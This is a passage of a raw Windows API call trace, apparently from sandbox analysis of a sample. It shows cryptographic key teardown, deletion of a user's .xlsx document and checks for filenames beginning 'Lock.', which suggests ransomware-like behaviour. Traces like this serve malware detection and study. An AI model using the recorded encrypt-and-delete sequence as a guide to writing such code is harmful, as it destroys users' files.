hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.056] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.056] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.056] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.056] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.056] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.056] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab8a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0220.057] CryptDestroyKey (hKey=0x9e2138) returned 1 [0220.057] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.057] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.057] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.057] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.057] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.057] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.057] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.057] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.057] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.057] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.057] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.057] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.057] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.057] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.057] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.057] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.057] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.057] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.057] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.057] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.070] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.070] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.070] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.070] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.070] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.070] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.070] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.070] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.070] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.070] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.070] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.070] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.070] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.071] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.071] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.071] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.071] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.071] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.071] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.071] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.071] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.071] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0220.071] CryptReleaseContext (hProv=0xa7bab0, dwFlags=0x0) returned 1 [0220.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.071] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.071] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.072] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.072] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.072] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.072] FreeLibrary (hLibModule=0x76390000) returned 1 [0220.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.072] CloseHandle (hObject=0x524) returned 1 [0220.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.073] CloseHandle (hObject=0x510) returned 1 [0220.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.075] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.075] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.075] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.075] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/oXBXXG.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\oXBXXG.xlsx", lpFilePart=0x8cedf4*="oXBXXG.xlsx") returned 0x25 [0220.075] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oXBXXG.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\oxbxxg.xlsx")) returned 0x20 [0220.075] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\oXBXXG.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aadc160, ftCreationTime.dwHighDateTime=0x1d574eb, ftLastAccessTime.dwLowDateTime=0xe2f72c30, ftLastAccessTime.dwHighDateTime=0x1d5a19b, ftLastWriteTime.dwLowDateTime=0xe2f72c30, ftLastWriteTime.dwHighDateTime=0x1d5a19b, nFileSizeHigh=0x0, nFileSizeLow=0xa07d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="oXBXXG.xlsx", cAlternateFileName="OXBXXG~1.XLS")) returned 0x9e1c38 [0220.076] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oXBXXG.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\oxbxxg.xlsx")) returned 1 [0220.101] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aadc160, ftCreationTime.dwHighDateTime=0x1d574eb, ftLastAccessTime.dwLowDateTime=0xe2f72c30, ftLastAccessTime.dwHighDateTime=0x1d5a19b, ftLastWriteTime.dwLowDateTime=0xe2f72c30, ftLastWriteTime.dwHighDateTime=0x1d5a19b, nFileSizeHigh=0x0, nFileSizeLow=0xa07d, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="oXBXXG.xlsx", cAlternateFileName="OXBXXG~1.XLS")) returned 0 [0220.101] FindClose (in: hFindFile=0x9e1c38 | out: hFindFile=0x9e1c38) returned 1 [0220.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854650 | out: hHeap=0x2af0000) returned 1 [0220.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.102] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0220.102] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0220.102] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0220.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0220.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0220.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0220.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854bf0 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0220.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0220.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb4d0 [0220.104] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/oXBXXG.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\oXBXXG.xlsx", lpFilePart=0x8cf650*="oXBXXG.xlsx") returned 0x25 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb4d0 | out: hHeap=0x2af0000) returned 1 [0220.104] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oXBXXG.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\oxbxxg.xlsx")) returned 0xffffffff [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854bf0 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.104] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0220.104] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.104] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0220.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0220.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0220.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0220.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0220.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qf_lD4ykVY6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f_lD4ykVY6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_lD4ykVY6P7.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lD4ykVY6P7.pptx", cchCount1=5, 